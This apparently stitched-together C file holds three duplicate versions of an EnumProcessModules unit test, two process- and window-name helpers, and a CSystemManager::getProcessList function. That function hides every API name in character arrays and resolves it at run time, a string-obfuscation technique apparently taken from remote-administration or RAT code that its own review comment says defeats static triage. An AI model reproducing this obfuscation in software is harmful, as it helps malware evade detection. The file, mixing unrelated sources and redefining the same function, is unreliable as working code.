/*
 * Exercise EnumProcessModules() through the pEnumProcessModules pointer:
 * two handle/access failures first, then two successful enumerations.
 *
 * hpQI and hpQV are process handles defined outside this block; judging by
 * the expected results, hpQI lacks the access right the call needs while
 * hpQV has it (TODO confirm against the test setup).
 */
static void test_EnumProcessModules(void)
{
    HMODULE first_module = GetModuleHandle(NULL);
    DWORD success, err, module_count, bytes_needed = 0xdeadbeef;

    /* A NULL process handle must be refused. */
    SetLastError(0xdeadbeef);
    pEnumProcessModules(NULL, NULL, 0, &bytes_needed);
    err = GetLastError();
    ok(err == ERROR_INVALID_HANDLE, "expected error=ERROR_INVALID_HANDLE but got %d\n", err);

    /* A handle without sufficient access must be refused as well. */
    SetLastError(0xdeadbeef);
    pEnumProcessModules(hpQI, NULL, 0, &bytes_needed);
    err = GetLastError();
    ok(err == ERROR_ACCESS_DENIED, "expected error=ERROR_ACCESS_DENIED but got %d\n", err);

    /* Size query only: no output buffer, just the byte count. */
    SetLastError(0xdeadbeef);
    success = pEnumProcessModules(hpQV, NULL, 0, &bytes_needed);
    ok(success == 1, "failed with %d\n", GetLastError());

    /* Room for exactly one module handle. */
    SetLastError(0xdeadbeef);
    success = pEnumProcessModules(hpQV, &first_module, sizeof(HMODULE), &bytes_needed);
    if (success != 1)
    {
        return;
    }

    /* bytes_needed is a byte count; convert it to a number of handles.
     * NOTE(review): the upper bound compares that count against
     * 5 * sizeof(HMODULE), which mixes units (modules vs. bytes) - confirm
     * the intended limit before tightening it. */
    module_count = bytes_needed / sizeof(HMODULE);
    ok(module_count >= 3 && module_count <= 5 * sizeof(HMODULE), "cbNeeded=%d\n", bytes_needed);

    /* The first module reported should be the main executable image. */
    ok(first_module == GetModuleHandle(NULL), "hMod=%p GetModuleHandle(NULL)=%p\n", first_module, GetModuleHandle(NULL));
}
/*
 * Exercise EnumProcessModules() through the pEnumProcessModules pointer,
 * using the w32_err()/w32_suc() helpers to check each call.
 *
 * w32_err(), w32_suc(), hpQI and hpQV are defined outside this block.
 * Presumably w32_err(call, code) expects the call to fail with that last
 * error and w32_suc(call) expects success and yields non-zero - TODO confirm.
 */
static void test_EnumProcessModules(void)
{
    /* Pre-seed hMod with the expected answer and cbNeeded with a sentinel. */
    HMODULE hMod = GetModuleHandle(NULL);
    DWORD cbNeeded = 0xdeadbeef;

    /* A NULL process handle must be refused. */
    w32_err(pEnumProcessModules(NULL, NULL, 0, &cbNeeded), ERROR_INVALID_HANDLE);
    /* hpQI is expected to be refused with ERROR_ACCESS_DENIED. */
    w32_err(pEnumProcessModules(hpQI, NULL, 0, &cbNeeded), ERROR_ACCESS_DENIED);
    /* Size query only: no output buffer. */
    w32_suc(pEnumProcessModules(hpQV, NULL, 0, &cbNeeded));
    /* Room for exactly one handle; the remaining checks need this to succeed. */
    if(!w32_suc(pEnumProcessModules(hpQV, &hMod, sizeof(HMODULE), &cbNeeded)))
        return;
    /* NOTE(review): the upper bound compares a module count against
     * 5 * sizeof(HMODULE), which mixes units (modules vs. bytes) - confirm
     * the intended limit. */
    ok(cbNeeded / sizeof(HMODULE) >= 3 && cbNeeded / sizeof(HMODULE) <= 5 * sizeof(HMODULE), "cbNeeded=%d\n", cbNeeded);
    /* The first module reported should be the main executable image. */
    ok(hMod == GetModuleHandle(NULL), "hMod=%p GetModuleHandle(NULL)=%p\n", hMod, GetModuleHandle(NULL));
}
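/*
 * Exercise EnumProcessModules() through the pEnumProcessModules pointer.
 *
 * Covers, in order: a NULL process handle, a handle that is refused with
 * ERROR_ACCESS_DENIED (hpQI), NULL lpcbNeeded pointers, a NULL output buffer
 * with a non-zero size, and finally successful enumerations on hpQV.
 * hpQI and hpQV are process handles defined outside this block.
 *
 * If the module count is outside the expected range, the test fails and
 * dumps the module list to help diagnose it.
 */
static void test_EnumProcessModules(void)
{
    HMODULE hMod = GetModuleHandleA(NULL);
    DWORD ret, cbNeeded = 0xdeadbeef;

    /* A NULL process handle must be refused. */
    SetLastError(0xdeadbeef);
    pEnumProcessModules(NULL, NULL, 0, &cbNeeded);
    ok(GetLastError() == ERROR_INVALID_HANDLE, "expected error=ERROR_INVALID_HANDLE but got %d\n", GetLastError());

    /* hpQI must be refused for lack of access. */
    SetLastError(0xdeadbeef);
    pEnumProcessModules(hpQI, NULL, 0, &cbNeeded);
    ok(GetLastError() == ERROR_ACCESS_DENIED, "expected error=ERROR_ACCESS_DENIED but got %d\n", GetLastError());

    /* With hpQI the access failure is reported even though lpcbNeeded is NULL. */
    SetLastError(0xdeadbeef);
    ret = pEnumProcessModules(hpQI, &hMod, sizeof(HMODULE), NULL);
    ok(!ret, "succeeded\n");
    ok(GetLastError() == ERROR_ACCESS_DENIED, "expected error=ERROR_ACCESS_DENIED but got %d\n", GetLastError());

    /* With a usable handle, a NULL lpcbNeeded is reported as ERROR_NOACCESS. */
    SetLastError(0xdeadbeef);
    ret = pEnumProcessModules(hpQV, &hMod, sizeof(HMODULE), NULL);
    ok(!ret, "succeeded\n");
    ok(GetLastError() == ERROR_NOACCESS, "expected error=ERROR_NOACCESS but got %d\n", GetLastError());

    /* Size query only: no output buffer and a size of zero. */
    SetLastError(0xdeadbeef);
    ret = pEnumProcessModules(hpQV, NULL, 0, &cbNeeded);
    ok(ret == 1, "failed with %d\n", GetLastError());

    /* A NULL output buffer with a non-zero size must fail. */
    SetLastError(0xdeadbeef);
    ret = pEnumProcessModules(hpQV, NULL, sizeof(HMODULE), &cbNeeded);
    ok(!ret, "succeeded\n");
    ok(GetLastError() == ERROR_NOACCESS, "expected error=ERROR_NOACCESS but got %d\n", GetLastError());

    /* Room for exactly one handle; the remaining checks need this to succeed. */
    SetLastError(0xdeadbeef);
    ret = pEnumProcessModules(hpQV, &hMod, sizeof(HMODULE), &cbNeeded);
    if(ret != 1)
        return;
    ok(hMod == GetModuleHandleA(NULL),
       "hMod=%p GetModuleHandleA(NULL)=%p\n", hMod, GetModuleHandleA(NULL));
    ok(cbNeeded % sizeof(hMod) == 0, "not a multiple of sizeof(HMODULE) cbNeeded=%d\n", cbNeeded);
    /* Windows sometimes has a bunch of extra dlls, presumably brought in by
     * aclayers.dll.
     */
    if (cbNeeded < 4 * sizeof(HMODULE) || cbNeeded > 30 * sizeof(HMODULE))
    {
        HMODULE hmods[100];
        unsigned int count;
        int i;
        ok(0, "cbNeeded=%d\n", cbNeeded);

        /* Diagnostic dump only. If the call fails, hmods holds nothing valid. */
        if (!pEnumProcessModules(hpQV, hmods, sizeof(hmods), &cbNeeded))
        {
            trace("module enumeration failed with %d\n", GetLastError());
            return;
        }

        /* cbNeeded is the number of bytes REQUIRED, which can exceed the
         * bytes actually written into hmods. Clamp to the array capacity so
         * the loop never reads past the end of hmods. */
        count = cbNeeded / sizeof(*hmods);
        if (count > sizeof(hmods) / sizeof(*hmods))
            count = sizeof(hmods) / sizeof(*hmods);

        for (i = 0 ; i < (int)count; i++)
        {
            char path[1024];
            /* On failure path is not filled in; print an empty name instead
             * of passing uninitialized bytes to %s. */
            if (!GetModuleFileNameA(hmods[i], path, sizeof(path)))
                path[0] = '\0';
            trace("i=%d hmod=%p path=[%s]\n", i, hmods[i], path);
        }
    }
}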
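/*
 * Resolve a process id to the path of its first module (the executable).
 *
 * pid       process id to look up
 * buf       receives the NUL-terminated name
 * buf_size  size of buf in bytes
 *
 * Returns TRUE when buf holds a name (either a path, or the literal
 * "System" for the error codes listed below), FALSE otherwise. When
 * psapi.dll is not loaded (g_psapi == NULL) or the buffer arguments are
 * unusable, FALSE is returned and buf is left untouched.
 *
 * NOTE(review): the "System" fallback is keyed on the last-error value only,
 * so any other process whose lookup fails with ERROR_PARTIAL_COPY or
 * ERROR_NOACCESS is reported as "System" too. If callers base a security
 * decision on this name, that mapping should be re-checked.
 *
 * NOTE(review): on Windows Vista and later, QueryFullProcessImageName() with
 * a PROCESS_QUERY_LIMITED_INFORMATION handle returns the image path without
 * requesting PROCESS_VM_READ; the comments here suggest the code targets
 * NT4/2000, where that API is not available.
 */
BOOL get_pname_by_pid(u_long pid, char *buf, int buf_size)
{
    BOOL result;
    HANDLE h_process;
    HMODULE h_module = NULL;
    DWORD n;

    // every path below writes at least a terminator, so buf must hold one byte
    if (buf == NULL || buf_size <= 0)
        return FALSE;

    if (g_psapi == NULL)
        return FALSE;       // failed to load psapi.dll

    // try to resolve pid to pname
    h_process = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pid);
    if (h_process != NULL)
        pEnumProcessModules(h_process, &h_module, sizeof(h_module), &n);

    // on error write pid
    if (h_module == NULL ||
        pGetModuleFileNameEx(h_process, h_module, buf, buf_size) == 0) {

        // read the error once so both comparisons see the same value
        DWORD err = GetLastError();

        // for "System" process last error value is:
        // * ERROR_PARTIAL_COPY (on 2k)
        // * ERROR_NOACCESS (on NT4)
        // ??? on other (TODO: think about another way)
        if (err == ERROR_PARTIAL_COPY || err == ERROR_NOACCESS) {
            strncpy(buf, "System", buf_size);
            buf[buf_size - 1] = '\0';
            result = TRUE;
        } else {
            *buf = '\0';
            result = FALSE;
        }

    } else {
        // do not rely on the API to terminate a truncated path
        buf[buf_size - 1] = '\0';

        if (strchr(buf, '~') != NULL) {     // XXX is it a right way?
            // a '~' suggests a short (8.3) path: try to expand it to the long form
            char long_name[MAX_PATH] = "";

            my_GetLongPathName(buf, long_name, sizeof(long_name));
            long_name[sizeof(long_name) - 1] = '\0';

            // keep the short path if the expansion produced nothing; copying
            // an unfilled long_name would hand the caller garbage
            if (long_name[0] != '\0') {
                strncpy(buf, long_name, buf_size - 1);
                buf[buf_size - 1] = '\0';
            }
        }
        result = TRUE;
    }

    if (h_process != NULL)
        CloseHandle(h_process);
    return result;
}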
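/*
 * Find the module name of the application that owns a window.
 *
 * Window       window handle to look up
 * processName  receives the NUL-terminated name; must have room for at
 *              least MAX_PATH characters (the PSAPI path passes MAX_PATH
 *              as the buffer size)
 *
 * Returns the length of the name written, or 0 when nothing was found.
 *
 * Two lookup paths exist, chosen by which function pointers were resolved:
 * Toolhelp (walk the module snapshot and match the window's instance
 * handle) or PSAPI (take the first module of the process).
 */
int GetAppByWindow(HWND Window, LPSTR processName)
{
    DWORD pid = 0;
    HANDLE hPr;

    if (processName == NULL)
        return 0;
    processName[0] = 0;

    // determine the process id of the window handle; a zero return means the
    // handle is not a valid window and pid was not filled in
    if (GetWindowThreadProcessId(Window, &pid) == 0)
        return 0;

    if (pCreateToolhelp32Snapshot && pModule32First && pModule32Next)
    {
        // grab all the modules associated with the process
        hPr = pCreateToolhelp32Snapshot(TH32CS_SNAPMODULE, pid);

        if (hPr != INVALID_HANDLE_VALUE)
        {
            MODULEENTRY32 me;
            HINSTANCE hi = (HINSTANCE)GetWindowLongPtr(Window, GWLP_HINSTANCE);

            me.dwSize = sizeof(me);
            if (pModule32First(hPr, &me))
            {
                do
                {
                    if (me.hModule == hi)
                    {
                        // bounded copy: never write more than the MAX_PATH
                        // characters the caller is required to provide
                        lstrcpynA(processName, me.szModule, MAX_PATH);
                        break;
                    }
                } while (pModule32Next(hPr, &me));
            }
            CloseHandle(hPr);
        }
    }
    else if (pGetModuleBaseName && pEnumProcessModules)
    {
        HMODULE hMod;
        DWORD cbNeeded;

        hPr = OpenProcess(PROCESS_QUERY_INFORMATION|PROCESS_VM_READ, FALSE, pid);
        if (hPr != NULL)
        {
            if (pEnumProcessModules(hPr, &hMod, sizeof(hMod), &cbNeeded))
            {
                // on failure the buffer contents are not guaranteed, so
                // report "not found" rather than measuring whatever is there
                if (pGetModuleBaseName(hPr, hMod, processName, MAX_PATH) == 0)
                    processName[0] = 0;
            }
            CloseHandle(hPr);
        }
    }

    // dbg_printf("appname = %s\n", processName);
    return (int)strlen(processName);
}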
// Build a flat byte buffer describing the running processes.
//
// Layout of the returned buffer, as written below:
//   byte 0            TOKEN_PSLIST (tag constant defined elsewhere)
//   then per process  DWORD process id,
//                     NUL-terminated pe32.szExeFile,
//                     NUL-terminated module path from GetModuleFileNameExA
//
// Returns NULL if the process snapshot cannot be created; otherwise a buffer
// obtained from LocalAlloc/LocalReAlloc and trimmed to dwOffset bytes.
// Nothing in this function frees it, so the caller presumably owns it -
// TODO confirm.
//
// NOTE(review): every API used here is resolved at run time with
// GetProcAddress(LoadLibrary(...)), and most names are assembled from
// individual characters in local arrays rather than written as string
// literals. This pattern typically keeps the names out of the import table
// and out of plain string listings, so static triage should not rely on
// imports or strings alone for this code. "LocalSize", "KERNEL32.dll" and
// "PSAPI.DLL" are still ordinary literals.
//
// NOTE(review): none of the resolved pointers, nor any allocation or API
// result, is checked before use.
LPBYTE CSystemManager::getProcessList()
{
	HANDLE hSnapshot = NULL;
	HANDLE hProcess = NULL;
	HMODULE hModules = NULL;
	PROCESSENTRY32 pe32 = {0};
	DWORD cbNeeded;
	char strProcessName[MAX_PATH] = {0};
	LPBYTE lpBuffer = NULL;
	DWORD dwOffset = 0;
	DWORD dwLength = 0;

	// "KERNEL32.dll" and "CreateToolhelp32Snapshot", built character by character
	char SSzlC11[] = {'K','E','R','N','E','L','3','2','.','d','l','l','\0'};
	char SSzlC10[] = {'C','r','e','a','t','e','T','o','o','l','h','e','l','p','3','2','S','n','a','p','s','h','o','t','\0'};
	CreateToolhelp32SnapshotT pCreateToolhelp32Snapshot= (CreateToolhelp32SnapshotT)GetProcAddress(LoadLibrary(SSzlC11),SSzlC10);
	// Snapshot of all processes in the system
	hSnapshot = pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

	if(hSnapshot == INVALID_HANDLE_VALUE)
		return NULL;

	pe32.dwSize = sizeof(PROCESSENTRY32);

	// "LocalAlloc"
	char SSzlC20[] = {'L','o','c','a','l','A','l','l','o','c','\0'};
	LocalAllocT pLocalAlloc=(LocalAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),SSzlC20);
	// Initial 1024-byte buffer; grown on demand inside the loop
	lpBuffer = (LPBYTE)pLocalAlloc(LPTR, 1024);

	// First byte is the tag; records start at offset 1
	lpBuffer[0] = TOKEN_PSLIST;
	dwOffset = 1;

	// "lstrlenA"
	char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'};
	lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01);
	LocalSizeT pLocalSize=(LocalSizeT)GetProcAddress(LoadLibrary(SSzlC11),"LocalSize");
	// "OpenProcess"
	char FBwWp14[] = {'O','p','e','n','P','r','o','c','e','s','s','\0'};
	OpenProcessT pOpenProcess=(OpenProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp14);
	// "Process32Next"
	char MyProcess32Next[] ={'P','r','o','c','e','s','s','3','2','N','e','x','t','\0'};
	Process32NextT pProcess32Next= (Process32NextT)GetProcAddress(LoadLibrary(SSzlC11),MyProcess32Next);
	// "Process32First"
	char MyProcess32First[] ={'P','r','o','c','e','s','s','3','2','F','i','r','s','t','\0'};
	Process32FirstT pProcess32First= (Process32FirstT)GetProcAddress(LoadLibrary(SSzlC11),MyProcess32First);
	// "LocalReAlloc"
	char FBwWp29[] = {'L','o','c','a','l','R','e','A','l','l','o','c','\0'};
	LocalReAllocT pLocalReAlloc=(LocalReAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp29);
	// "EnumProcessModules"
	char DYrEN15[] = {'E','n','u','m','P','r','o','c','e','s','s','M','o','d','u','l','e','s','\0'};
	EnumProcessModulesT pEnumProcessModules=(EnumProcessModulesT)GetProcAddress(LoadLibrary("PSAPI.DLL"),DYrEN15);
	// "GetModuleFileNameExA"
	char DYrEN13[] = {'G','e','t','M','o','d','u','l','e','F','i','l','e','N','a','m','e','E','x','A','\0'};
	GetModuleFileNameExAT pGetModuleFileNameExA=(GetModuleFileNameExAT)GetProcAddress(LoadLibrary("PSAPI.DLL"),DYrEN13);

	if(pProcess32First(hSnapshot, &pe32))
	{
		do
		{
			// NOTE(review): a handle is opened for every snapshot entry,
			// including the ids skipped below, and is never closed in this
			// function - one leaked handle per process per call.
			hProcess = pOpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pe32.th32ProcessID);
			// Skip process ids 0, 4 and 8 (presumably the idle/System
			// pseudo-processes on different Windows versions - TODO confirm)
			if ((pe32.th32ProcessID !=0 ) && (pe32.th32ProcessID != 4) && (pe32.th32ProcessID != 8))
			{
				// Ask only for the first module handle.
				// NOTE(review): neither result is checked and strProcessName
				// is not cleared per iteration, so when a lookup fails the
				// record may carry the path left over from an earlier
				// process.
				pEnumProcessModules(hProcess, &hModules, sizeof(hModules), &cbNeeded);
				pGetModuleFileNameExA(hProcess, hModules, strProcessName, sizeof(strProcessName));
				// Size of the data this process record occupies
				dwLength = sizeof(DWORD) + plstrlenA(pe32.szExeFile) + plstrlenA(strProcessName) + 2;
				// Buffer too small: reallocate it
				if (pLocalSize(lpBuffer) < (dwOffset + dwLength))
					lpBuffer = (LPBYTE)pLocalReAlloc(lpBuffer, (dwOffset + dwLength), LMEM_ZEROINIT|LMEM_MOVEABLE);

				// Append the record: pid, exe name, module path
				Gyfunction->my_memcpy(lpBuffer + dwOffset, &(pe32.th32ProcessID), sizeof(DWORD));
				dwOffset += sizeof(DWORD);

				Gyfunction->my_memcpy(lpBuffer + dwOffset, pe32.szExeFile, plstrlenA(pe32.szExeFile) + 1);
				dwOffset += plstrlenA(pe32.szExeFile) + 1;

				Gyfunction->my_memcpy(lpBuffer + dwOffset, strProcessName, plstrlenA(strProcessName) + 1);
				dwOffset += plstrlenA(strProcessName) + 1;
			}
		}
		while(pProcess32Next(hSnapshot, &pe32));
	}

	// Trim the buffer to the number of bytes actually written
	lpBuffer = (LPBYTE)pLocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE);

	// "CloseHandle"; only the snapshot handle is released
	char BrmAP29[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'};
	CloseHandleT pCloseHandle=(CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),BrmAP29);
	pCloseHandle(hSnapshot);
	return lpBuffer;
}